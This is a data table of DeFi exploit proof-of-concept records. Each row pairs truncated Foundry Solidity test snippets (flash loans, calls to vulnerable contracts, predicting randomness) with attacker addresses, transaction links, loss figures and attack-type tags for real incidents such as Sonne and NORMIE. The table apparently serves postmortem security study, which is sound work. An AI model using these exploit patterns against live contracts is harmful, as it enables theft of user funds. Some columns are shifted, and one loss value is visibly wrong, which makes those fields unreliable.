// Attacker : https://bscscan.com/address/0x56b2d55457b31fb4b78ebddd6718ea2667804a0... | exploit_poc | LW | 2024-07 | LW_exp.sol | null | f42458dc9a8e2479 | 2026-01-07T10:59:16.540192 | postmortems | bsc | 40,287,544 | ~7K USD | 7,000 | https://bscscan.com/address/0x56b2d55457b31fb4b78ebddd6718ea2667804a06 | https://bscscan.com/address/0xfe7e9c76affdba7b7442adaca9c7c059ec3092fc | null | null | null | null | true | false | false | low | ~7K USD | unknown | false | https://bscscan.com/address/0x56b2d55457b31fb4b78ebddd6718ea2667804a06 | https://bscscan.com/address/0xfe7e9c76affdba7b7442adaca9c7c059ec3092fc | $7.0K | 3.27 | low | LW Exploit (2024-07) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~56K BUSD
// TX : https://app.blocksec.com/explorer/tx/bsc/0x9a8c4c4edb7a76ecfa935780124c409f83a08d15c560bb67302182f8969be20d
// Attacker : https://bscscan.com/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32
// Attack Contrac... | exploit_poc | SBT | 2024-07 | SBT_exp.sol | null | 4641e260e4fb9ebc | 2026-01-07T10:59:16.540235 | postmortems | bsc | 40,378,160 | ~56K BUSD | 56,000 | https://bscscan.com/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32 | https://bscscan.com/address/0x88f9e1799465655f0dd206093dbd08922a1d9e28 | null | null | null | null | true | false | false | medium | ~56K BUSD | unknown | function testExploit() public {
emit log_named_decimal_uint("Attacker BUSD balance before attack", BUSD.balanceOf(address(this)), 18);
Pool.flash(address(this), 1_950_000 ether, 0, "0x123");
emit log_named_decimal_uint("Attacker BUSD balance after attack", BUSD.balanceOf(address(this)), 18);
... | true | ~56K BUSD | https://bscscan.com/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32 | https://bscscan.com/address/0x88f9e1799465655f0dd206093dbd08922a1d9e28 | $56.0K | 4.95 | low | SBT Exploit (2024-07) | true | false | false | false | ||||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
IRewardsHypervisor irrewards = IRewardsHypervisor(0xC9f27A50f82571C1C8423A42... | exploit_poc | Visor | 2021-12 | Visor_exp.sol | null | b940f6bf00db087a | 2026-01-07T10:59:16.540275 | postmortems | unknown | 13,849,006 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
irrewards.deposit(100_000_000_000_000_000_000_000_000, address(this), msg.sender);
// VISR_Balance = visr.balanceOf(msg.sender);
emit log_named_uint("Attacker VIST Balance", visr.balanceOf(msg.sender));
} | true | Unknown | 2.53 | low | Visor Exploit (2021-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
address btcAddress = 0x321162Cd933E2Be498Cd2267a90534A804051b11;
address wftmAddress = 0x21be370D5312f44cB42ce377BC9b8a0cEF1A4C83;
address routerAddress ... | exploit_poc | Grim | 2021-12 | Grim_exp.sol | flash_loan | 08c61f4c748481e7 | 2026-01-07T10:59:16.540311 | postmortems | unknown | 25,345,002 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
//Flash Loan WFTM and "BTC" frm BeethovenX
IERC20[] memory loanTokens = new IERC20[](2);
loanTokens[0] = wftm;
loanTokens[1] = btc;
uint256[] memory loanAmounts = new uint256[](2);
loanAmounts[0] = wftmLoanAmount;
loanAmounts[1] = b... | true | Unknown | 4.98 | low | Grim Exploit (2021-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// tx: https://bscscan.com/tx/0xea95925eb0438e04d0d81dc270a99ca9fa18b94ca8c6e34272fc9e09266fcf1d
// analysis: https://blocksecteam.medium.com/the-analysis-of-nerve-bridge-security-incident-ead361a... | exploit_poc | NerveBridge | 2021-12 | NerveBridge_exp.sol | flash_loan | a765f759e2988103 | 2026-01-07T10:59:16.540359 | postmortems | bsc | null | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExp() public {
// 1. flashloan 50000 busd from fortube
flashloanProvider.flashloan(address(this), busd, 50_000 ether, "0x");
console.log("final busd profit: ", IERC20(busd).balanceOf(address(this)) / 10 ** IERC20(busd).decimals());
} | true | Unknown | 4.81 | low | NerveBridge Exploit (2021-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// TX : https://app.blocksec.com/explorer/tx/bsc/0x5446bf2b57749abdab01813a50ce36246177f3437599f3a56bc1554f596b2c3a
// GUY : https://x.com/SlowMist_Team/status/1795648617530995130
// Profit : ~33 ... | exploit_poc | EXcommunity | 2024-05 | EXcommunity_exp.sol | null | 7cf2884c90c8c29e | 2026-01-07T10:59:16.540421 | postmortems | unknown | 39,123,756 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 2.82 | low | EXcommunity Exploit (2024-05) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// TX : https://app.blocksec.com/explorer/tx/bsc/0x12e8c24dec36a29fdd9b9d7a8b587b3abd2519089b6438c194e6e5eb357b68d8
// GUY : https://x.com/ChainAegis/status/1789490986588205529
// Profit : ~32K US... | exploit_poc | TGC | 2024-05 | TGC_exp.sol | null | 7d2dc2cd8ce94777 | 2026-01-07T10:59:16.540483 | postmortems | unknown | 38,623,654 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function attack() public {
swap_token_to_token(address(USDT), address(TGC), 100 ether);
approveAll();
address(vulnContract).call(abi.encodeWithSelector(bytes4(0x836aefb0), 100_000_000_000_000_000_000));
vm.warp(block.timestamp + 5 hours);
// emit log_named_decimal_uint("Pair USDT... | true | Unknown | 3.58 | low | TGC Exploit (2024-05) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~$20M USD$
// Attacker EOA1 : https://optimistic.etherscan.io/address/0x5d0d99e9886581ff8fcb01f35804317f5ed80bbb
// Attacker EOA2 : https://optimistic.etherscan.io/address... | exploit_poc | Sonne | 2024-05 | Sonne_exp.sol | flash_loan | 3d5684bcdd8a3be9 | 2026-01-07T10:59:16.540531 | postmortems | ethereum | 120,062,493 | ~$20M USD$ | 20,000,000 | null | null | null | null | null | null | true | false | true | critical | ~$20M USD$ | flash-loan | function testExploit() public {
// 1. Execute proposals
bytes memory data1 = hex"fca7820b0000000000000000000000000000000000000000000000000429d069189e0000";
bytes memory data2 = hex"f2b3abbd0000000000000000000000007320bd5fa56f8a7ea959a425f0c0b8cac56f741e";
bytes memory data3 = hex"55ee... | true | ~$20M USD$ | $20.00M | 8 | high | Sonne Exploit (2024-05) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Profit : ~32K USD
// TX : https://app.blocksec.com/explorer/tx/bsc/0x2c0ada695a507d7a03f4f308f545c7db4847b2b2c82de79e702d655d8c95dadb
// GUY : https://twitter.com/PeckShieldAlert/status/1788153... | exploit_poc | GPU | 2024-05 | GPU_exp.sol | flash_loan | 414e27a4b2d09043 | 2026-01-07T10:59:16.540587 | postmortems | bsc | 38,539,572 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public balanceLog {
busdWbnbPair.swap(22_600 ether, 0, address(this), "0x42");
} | true | Unknown | 4.36 | low | GPU Exploit (2024-05) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// TX : https://app.blocksec.com/explorer/tx/bsc/0xc7927a68464ebab1c0b1af58a5466da88f09ba9b30e6c255b46b1bc2e7d1bf09
// GUY : https://twitter.com/SlowMist_Team/status/1787330586857861564
// Profit ... | exploit_poc | OSN | 2024-05 | OSN_exp.sol | null | f47c6f21459cbf06 | 2026-01-07T10:59:16.540653 | postmortems | bsc | 38,474,365 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 3 | low | OSN Exploit (2024-05) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : $490K
// Attack Tx : https://app.blocksec.com/explorer/tx/base/0xa618933a0e0ffd0b9f4f0835cc94e523d0941032821692c01aa96cd6f80fc3fd
// Price : https://dexscreener.com/bas... | exploit_poc | NORMIE | 2024-05 | NORMIE_exp.sol | flash_loan | 5868d184bf5e8154 | 2026-01-07T10:59:16.540716 | postmortems | base | 14,952,783 | $490K | 490,000 | null | null | null | https://app.blocksec.com/explorer/tx/base/0xa618933a0e0ffd0b9f4f0835cc94e523d0941032821692c01aa96cd6f80fc3fd | null | null | true | false | true | high | $490K | flash-loan | function testExploit() public {
console.log("---------------------------------------------------");
console.log("ETH Balance before this attack: ", address(this).balance / 1e18);
console.log("---------------------------------------------------");
// 1. Swap 2 ETH to NORMIE on SushiV2
... | true | $490K | https://app.blocksec.com/explorer/tx/base/0xa618933a0e0ffd0b9f4f0835cc94e523d0941032821692c01aa96cd6f80fc3fd | $490.0K | 8.37 | high | NORMIE Exploit (2024-05) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : $464K
// Attacker : https://arbiscan.io/address/0x76b02ab483482740248e2ab38b5a879a31c6d008
// Attack Contract : https://arbiscan.io/address/0xb79714634895f52a4f6a75eceb58c962... | exploit_poc | PredyFinance | 2024-05 | PredyFinance_exp.sol | null | bdbb450f4647d99b | 2026-01-07T10:59:16.540783 | postmortems | arbitrum | null | $464K | 464,000 | https://arbiscan.io/address/0x76b02ab483482740248e2ab38b5a879a31c6d008 | https://arbiscan.io/address/0xb79714634895f52a4f6a75eceb58c96246370149 | https://arbiscan.io/address/0x7b8b944ab2f24c829504a7a6d70fce5298f2147c | https://arbiscan.io/tx/0xbe163f651d23f0c9e4d4a443c0cc163134a31a1c2761b60188adcfd33178f50f | null | null | true | true | false | high | $464K | unknown | function testExploit() public balanceLog {
USDC.approve(address(predyPool), type(uint256).max);
WETH.approve(address(predyPool), type(uint256).max);
//implement exploit code here
AddPairLogic.AddPairParams memory addPairParam = AddPairLogic.AddPairParams({
marginId: address(... | true | $464K | https://arbiscan.io/address/0x76b02ab483482740248e2ab38b5a879a31c6d008 | https://arbiscan.io/address/0xb79714634895f52a4f6a75eceb58c96246370149 | https://arbiscan.io/address/0x7b8b944ab2f24c829504a7a6d70fce5298f2147c | https://arbiscan.io/tx/0xbe163f651d23f0c9e4d4a443c0cc163134a31a1c2761b60188adcfd33178f50f | $464.0K | 9 | high | PredyFinance Exploit (2024-05) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "./../interface.sol";
import "../basetest.sol";
// @KeyInfo - Total Lost : 140K
// Attacker :https://basescan.org/address/0x7A5Eb99C993f4C075c222F9327AbC7426cFaE386
// Attack Contract :https://basescan.org/address/0xa2209b48506c4e7f3a879ec1c1c2c4e... | exploit_poc | TSURU | 2024-05 | TSURU_exp.sol | null | 4b5c9e53b951cf50 | 2026-01-07T10:59:16.540849 | postmortems | base | null | 140K | 140,000 | https://basescan.org/address/0x7A5Eb99C993f4C075c222F9327AbC7426cFaE386 | https://basescan.org/address/0xa2209b48506c4e7f3a879ec1c1c2c4ee16c2c017 | https://basescan.org/address/0x75Ac62EA5D058A7F88f0C3a5F8f73195277c93dA | https://basescan.org/tx/0xe63a8df8759f41937432cd34c590d85af61b3343cf438796c6ed2c8f5b906f62 | https://base.tsuru.wtf/usdtsuru-exploit-incident-report | https://x.com/shoucccc/status/1788941548929110416 | true | true | false | high | 140K | unknown | function testExploit() public balanceLog {
//First mint tokens with vulerable on onERC1155Received function
wrapper.onERC1155Received(address(0), address(this), 0, 418, new bytes(0));
assertEq(wrapper.balanceOf(address(this)), expectedTokens, "Not enough tokens");
//Swap the tokens to E... | true | 140K | https://basescan.org/address/0x7A5Eb99C993f4C075c222F9327AbC7426cFaE386 | https://basescan.org/address/0xa2209b48506c4e7f3a879ec1c1c2c4ee16c2c017 | https://basescan.org/address/0x75Ac62EA5D058A7F88f0C3a5F8f73195277c93dA | https://basescan.org/tx/0xe63a8df8759f41937432cd34c590d85af61b3343cf438796c6ed2c8f5b906f62 | https://base.tsuru.wtf/usdtsuru-exploit-incident-report | https://x.com/shoucccc/status/1788941548929110416 | $140.0K | 7.87 | medium | TSURU Exploit (2024-05) | true | true | true | true |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~645K
// TX : https://app.blocksec.com/explorer/tx/bsc/0x660837a1640dd9cc0561ab7ff6c85325edebfa17d8b11a3bb94457ba6dcae18c
// Attacker : https://bscscan.com/address/0x51177db1ff3b450007958447946a2eee388288d2
... | exploit_poc | Tradeonorion | 2024-05 | Tradeonorion_exp.sol | oracle_manipulation | 0f8fb071182d6efd | 2026-01-07T10:59:16.540927 | postmortems | bsc | 39,104,878 | ~645K | 645,000 | https://bscscan.com/address/0x51177db1ff3b450007958447946a2eee388288d2 | https://bscscan.com/address/0xf8bfac82bdd7ac82d3aeec98b9e1e73579509db6 | null | null | null | null | true | false | true | high | ~645K | oracle-manipulation | function testExploit() public {
emit log_named_decimal_uint("[Begin] Attacker ORN balance before exploit", ORN.balanceOf(address(this)), 8);
emit log_named_decimal_uint("[Begin] Attacker BNB balance before exploit", address(this).balance, 18);
emit log_named_decimal_uint("[Begin] Attacker XRP ba... | true | https://bscscan.com/address/0x51177db1ff3b450007958447946a2eee388288d2 | https://bscscan.com/address/0xf8bfac82bdd7ac82d3aeec98b9e1e73579509db6 | $645.0K | 8 | high | Tradeonorion Exploit (2024-05) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~76 ETH
// Attacker : 0x55Db954F0121E09ec838a20c216eABf35Ca32cDD
// Attack Contract : 0x55f5aac4466eb9b7bbeee8c05b365e5b18b5afcc
// Vulnerable Contract : 0xe51D3dE9b81916D... | exploit_poc | SCROLL | 2024-05 | SCROLL_exp.sol | null | 76f217b2f7ad6e71 | 2026-01-07T10:59:16.541018 | postmortems | ethereum | 19,971,611 | ~76 ETH | 76 | null | null | null | https://etherscan.io/tx/0x661505c39efe1174da44e0548158db95e8e71ce867d5b7190b9eabc9f314fe91 | null | null | true | true | false | low | ~76 ETH | unknown | function testExploit() public {
SCROLL.balanceOf(address(universalRouter));
bytes memory commands = hex"05";
bytes[] memory inputs = new bytes[](1);
inputs[0] = abi.encode(address(SCROLL), address(SCROLL_creater), uint256(1));
universalRouter.execute(commands, inputs);
SC... | true | ~76 ETH | https://etherscan.io/tx/0x661505c39efe1174da44e0548158db95e8e71ce867d5b7190b9eabc9f314fe91 | $76 | 6.4 | medium | SCROLL Exploit (2024-05) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~15 BNB
// Attacker : 0xc468D9A3a5557BfF457586438c130E3AFbeC2ff9
// Attack Contract : 0xfcECDBC62DEe7233E1c831D06653b5bEa7845FcC
// Vulnerable Contract : 0x9BDF251435cBC67... | exploit_poc | SATURN | 2024-05 | SATURN_exp.sol | null | 03a05901aa7a6bdb | 2026-01-07T10:59:16.541075 | postmortems | bsc | 38,488,209 | ~15 BNB | 15,000,000,000 | null | null | null | https://bscscan.com/tx/0x948132f219c0a1adbffbee5d9dc63bec676dd69341a6eca23790632cb9475312 | null | null | true | false | false | critical | ~15 BNB | unknown | function testExploit() public balanceLog {
approveAll();
// init saturn token
EnableSwitch(false);
vm.startPrank(holderOfToken);
SATURN.transfer(attacker, SATURN.balanceOf(holderOfToken));
vm.stopPrank();
EnableSwitch(true);
// start attack
pan... | true | ~15 BNB | https://bscscan.com/tx/0x948132f219c0a1adbffbee5d9dc63bec676dd69341a6eca23790632cb9475312 | $15000.00M | 7.72 | medium | SATURN Exploit (2024-05) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 1.7eth
// Attack Tx : https://etherscan.io/tx/0x3bba4fb6de00dd38df3ad68e51c19fe575a95a296e0632028f101c5199b6f714
// @Info
interface IBurner is IERC20 {
function c... | exploit_poc | Burner | 2024-05 | Burner_exp.sol | flash_loan | d39b5d0020edc54e | 2026-01-07T10:59:16.541129 | postmortems | ethereum | 19,917,290 | 1.7eth | 1.7 | null | null | null | https://etherscan.io/tx/0x3bba4fb6de00dd38df3ad68e51c19fe575a95a296e0632028f101c5199b6f714 | null | null | true | false | true | low | 1.7eth | flash-loan | function testExploit() public {
vm.deal(address(this), 70 ether); //simulation flashloan
weth_.deposit{value: 70 ether}();
weth_.approve(address(router_), type(uint256).max);
pnt_.approve(address(router_), type(uint256).max);
address[] memory path = new address[](2);
pat... | true | 1.7eth | https://etherscan.io/tx/0x3bba4fb6de00dd38df3ad68e51c19fe575a95a296e0632028f101c5199b6f714 | $2 | 7.13 | medium | Burner Exploit (2024-05) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// Profit : ~180K USD
// TX : https://app.blocksec.com/explorer/tx/bsc/0x3ad998a01ad1f1bbe6dba6a08e658c1749dabfa4a07da20ded3c73bcd6970d20
// GUY : https://x.com/Phalcon_xyz/status/179574682806485449... | exploit_poc | MetaDragon | 2024-05 | MetaDragon_exp.sol | null | 29e1e34216f613dc | 2026-01-07T10:59:16.541174 | postmortems | bsc | 39,141,426 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public balance_log {
for (uint256 i = 0; i < endTokenId; i++) {
bytes memory calldatas = abi.encodeWithSignature("transfer(address,uint256)", meta_token, i);
// don't check return value
meta_token.call(calldatas);
}
emit log_named_uint("... | true | Unknown | 2.96 | low | MetaDragon Exploit (2024-05) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import ".././interface.sol";
// @KeyInfo - Total Lost : Lost: =>10000 USD(WINR tokens)
// TX : https://app.blocksec.com/explorer/tx/arbitrum/0xf57f041cb6d8a10e11edab50b84e49b59ff834c7d114d1e049cedd654c36194d
// Attacker :htt... | exploit_poc | MixedSwapRouter | 2024-05 | MixedSwapRouter_exp.sol | null | 2269ea33e2814e6d | 2026-01-07T10:59:16.541229 | postmortems | arbitrum | 216,881,055 | Lost: =>10000 USD(WINR tokens) | 10,000 | https://arbiscan.io/address/0xfeef112831cc8f790abe71b4b196c220ee26ecf3 | https://arbiscan.io/address/0x4fba400b95cd9e3d7e4073ad6e6bbaf41e640cdf | https://arbiscan.io/address/0x58637aaac44e2a2f190d9e1976e236d86d691542 | null | null | null | true | true | false | medium | Lost: =>10000 USD(WINR tokens) | unknown | function attack() internal {
address one = create_contract(1);
} | true | Lost: =>10000 USD(WINR tokens) | https://arbiscan.io/address/0xfeef112831cc8f790abe71b4b196c220ee26ecf3 | https://arbiscan.io/address/0x4fba400b95cd9e3d7e4073ad6e6bbaf41e640cdf | https://arbiscan.io/address/0x58637aaac44e2a2f190d9e1976e236d86d691542 | $10.0K | 8 | high | MixedSwapRouter Exploit (2024-05) | true | true | false | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~$18K
// Attacker : https://bscscan.com/address/0xb9596d6e53d81981b9f06ca2ca6d3e422232d575
// Attack Contract : https://bscscan.com/address/0x258850ec735f6532fe34fe24ef9628... | exploit_poc | TCH | 2024-05 | TCH_exp.sol | null | 2f2ae0a9ea9360fb | 2026-01-07T10:59:16.541316 | postmortems | bsc | null | ~$18K | 18,000 | https://bscscan.com/address/0xb9596d6e53d81981b9f06ca2ca6d3e422232d575 | https://bscscan.com/address/0x258850ec735f6532fe34fe24ef9628992a9b7e84 | https://bscscan.com/address/0x5d78cfc8732fd328015c9b73699de9556ef06e8e | https://bscscan.com/tx/0xa94338d8aa312ed4b97b2a4dcb27f632b1ade6f3abec667e3bf9f002a75dabe0 | null | https://x.com/DecurityHQ/status/1791180322882629713 | true | true | false | medium | ~$18K | unknown | function testExploit() public {
deal(address(BUSDT), address(this), 0);
emit log_named_decimal_uint(
"Exploiter BUSDT balance before attack", BUSDT.balanceOf(address(this)), BUSDT.decimals()
);
BUSDT_USDC.flash(address(this), flashAmount, 0, bytes(""));
emit log_nam... | true | ~$18K | https://bscscan.com/address/0xb9596d6e53d81981b9f06ca2ca6d3e422232d575 | https://bscscan.com/address/0x258850ec735f6532fe34fe24ef9628992a9b7e84 | https://bscscan.com/address/0x5d78cfc8732fd328015c9b73699de9556ef06e8e | https://bscscan.com/tx/0xa94338d8aa312ed4b97b2a4dcb27f632b1ade6f3abec667e3bf9f002a75dabe0 | https://x.com/DecurityHQ/status/1791180322882629713 | $18.0K | 9 | high | TCH Exploit (2024-05) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "forge-std/interfaces/IERC20.sol";
// @KeyInfo - Total Lost : $12K
// Attacker : https://bscscan.com/address/0x36a6135672035507b772279d99a9f7445f2d1601
// Attack Contract : https://bscscan.com/address/0x471038827c05c87c2... | exploit_poc | RedKeysCoin | 2024-05 | RedKeysCoin_exp.sol | null | 31dd0a7a07d250b4 | 2026-01-07T10:59:16.541404 | postmortems | bsc | null | $12K | 12,000 | https://bscscan.com/address/0x36a6135672035507b772279d99a9f7445f2d1601 | https://bscscan.com/address/0x471038827c05c87c23e9dba5331c753337fd918b | https://bscscan.com/address/0x71e3056aa4985de9f5441f079e6c74454a3c95f0 | https://bscscan.com/tx/0x8d5fb97b35b830f8addcf31c8e0c6135f15bbc2163d891a3701ada0ad654d427 | null | https://x.com/SlowMist_Team/status/1794975336192438494 | true | true | false | medium | $12K | unknown | function testExploit() public balanceLog {
for (uint256 i = 0; i < 50; i++) {
// get current counter
uint256 counter = game.counter();
// estimate bet result by calculating the result of the function randomNumber
uint16 betResultExpectation = uint16(randomNumber(... | true | $12K | https://bscscan.com/address/0x36a6135672035507b772279d99a9f7445f2d1601 | https://bscscan.com/address/0x471038827c05c87c23e9dba5331c753337fd918b | https://bscscan.com/address/0x71e3056aa4985de9f5441f079e6c74454a3c95f0 | https://bscscan.com/tx/0x8d5fb97b35b830f8addcf31c8e0c6135f15bbc2163d891a3701ada0ad654d427 | https://x.com/SlowMist_Team/status/1794975336192438494 | $12.0K | 7.4 | medium | RedKeysCoin Exploit (2024-05) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~200K
// TX : https://app.blocksec.com/explorer/tx/bsc/0x1350cc72865420ba5d3c27234fd4665ad25c021b0a75ba03bc8340a1b1f98a45
// Attacker : https://bscscan.com/address/0x69... | exploit_poc | Liquiditytokens | 2024-05 | Liquiditytokens_exp.sol | null | 2619ce248a744463 | 2026-01-07T10:59:16.541496 | postmortems | bsc | 39,198,657 | ~200K | 200,000 | https://bscscan.com/address/0x6951eb8a4a1dab360f2230fb654551335d560ec0 | https://bscscan.com/address/0xbdfbb387fbf20379c016998ac609871c3357d749 | null | null | null | null | true | false | false | high | ~200K | unknown | function attack() internal { | true | https://bscscan.com/address/0x6951eb8a4a1dab360f2230fb654551335d560ec0 | https://bscscan.com/address/0xbdfbb387fbf20379c016998ac609871c3357d749 | $200.0K | 7 | medium | Liquiditytokens Exploit (2024-05) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "./../interface.sol";
import "forge-std/console.sol";
// @KeyInfo - Total Lost : 330K
// Attacker : https://etherscan.io/address/0xFcE19F8f823759b5867ef9a5055A376f20c5E454
// Attack Contract : https://etherscan.io/addr... | exploit_poc | GFOX | 2024-05 | GFOX_exp.sol | null | 520d755f8b36e472 | 2026-01-07T10:59:16.541574 | postmortems | ethereum | null | 330K | 330,000 | https://etherscan.io/address/0xFcE19F8f823759b5867ef9a5055A376f20c5E454 | https://etherscan.io/address/0x86C68d9e13d8d6a70b6423CEB2aEdB19b59F2AA5 | https://etherscan.io/address/0x47c4b3144de2c87a458d510c0c0911d1903d1686 | https://etherscan.io/tx/0x12fe79f1de8aed0ba947cec4dce5d33368d649903cb45a5d3e915cc459e751fc | https://neptunemutual.com/blog/how-was-galaxy-fox-token-exploited/ | https://twitter.com/CertiKAlert/status/1788751142144401886 | true | true | false | high | 330K | unknown | false | 330K | https://etherscan.io/address/0xFcE19F8f823759b5867ef9a5055A376f20c5E454 | https://etherscan.io/address/0x86C68d9e13d8d6a70b6423CEB2aEdB19b59F2AA5 | https://etherscan.io/address/0x47c4b3144de2c87a458d510c0c0911d1903d1686 | https://etherscan.io/tx/0x12fe79f1de8aed0ba947cec4dce5d33368d649903cb45a5d3e915cc459e751fc | https://neptunemutual.com/blog/how-was-galaxy-fox-token-exploited/ | https://twitter.com/CertiKAlert/status/1788751142144401886 | $330.0K | 5.2 | medium | GFOX Exploit (2024-05) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 101k USD
// Attacker : https://bscscan.com/address/0x7e7c1f0d567c0483f85e1d016718e44414cdbafe
// Attack Contract : https://bscscan.com/address/0x7e7c1f0d567c0483f85e1d016718e4... | exploit_poc | WETC_Token | 2025-07 | WETC_Token_exp.sol | null | 9cd0c57c99f797e5 | 2026-01-07T10:59:16.541625 | postmortems | bsc | null | 101k USD | 101,000 | https://bscscan.com/address/0x7e7c1f0d567c0483f85e1d016718e44414cdbafe | https://bscscan.com/address/0x7e7c1f0d567c0483f85e1d016718e44414cdbafe | https://bscscan.com/address/0xaf68efb3c1e81aad5cdb3d4962c8815fb754c688 | https://bscscan.com/tx/0x2b6b411adf6c452825e48b97857375ff82b9487064b2f3d5bc2ca7a5ed08d615 | https://t.me/evmhacks/78?single | null | true | true | false | high | 101k USD | unknown | function testExploit() public balanceLog {
// The exploit begins by taking a large flash loan from a PancakeSwap V3 pool.
IPancakeV3Pool(pancakeV3Pool).flash(address(this), borrowAmount, 0, "");
} | true | 101k USD | https://bscscan.com/address/0x7e7c1f0d567c0483f85e1d016718e44414cdbafe | https://bscscan.com/address/0x7e7c1f0d567c0483f85e1d016718e44414cdbafe | https://bscscan.com/address/0xaf68efb3c1e81aad5cdb3d4962c8815fb754c688 | https://bscscan.com/tx/0x2b6b411adf6c452825e48b97857375ff82b9487064b2f3d5bc2ca7a5ed08d615 | https://t.me/evmhacks/78?single | $101.0K | 8.02 | high | WETC_Token Exploit (2025-07) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 43k USD
// Attacker : https://bscscan.com/address/0xd7235d08a48cbd3f63b9faa16130f2fdb50b2341
// Attack Contract : https://bscscan.com/address/0x399eff46b7d458575ebbbb572098e6... | exploit_poc | Stepp2p | 2025-07 | Stepp2p_exp.sol | null | 06b0923499592d03 | 2026-01-07T10:59:16.541685 | postmortems | bsc | null | 43k USD | 43,000 | https://bscscan.com/address/0xd7235d08a48cbd3f63b9faa16130f2fdb50b2341 | https://bscscan.com/address/0x399eff46b7d458575ebbbb572098e62e38f3c993 | https://bscscan.com/address/0x99855380e5f48db0a6babeae312b80885a816dce | https://bscscan.com/tx/0xe94752783519da14315d47cde34da55496c39546813ef4624c94825e2d69c6a8 | null | https://x.com/TenArmorAlert/status/1946887946877149520 | true | true | false | medium | 43k USD | unknown | function testExploit() public balanceLog {
//implement exploit code here
bytes memory data = "0x623269464a7178";
IPancakeV3PoolActions(PANCAKE_V3_USDC_USDT).flash(address(this), 50_000 ether, 0, data);
} | true | 43k USD | https://bscscan.com/address/0xd7235d08a48cbd3f63b9faa16130f2fdb50b2341 | https://bscscan.com/address/0x399eff46b7d458575ebbbb572098e62e38f3c993 | https://bscscan.com/address/0x99855380e5f48db0a6babeae312b80885a816dce | https://bscscan.com/tx/0xe94752783519da14315d47cde34da55496c39546813ef4624c94825e2d69c6a8 | https://x.com/TenArmorAlert/status/1946887946877149520 | $43.0K | 7.23 | medium | Stepp2p Exploit (2025-07) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 13k USD
// Attacker : https://bscscan.com/address/0xa3e18e6028b1ca09433157cd6a5e807ffe705350
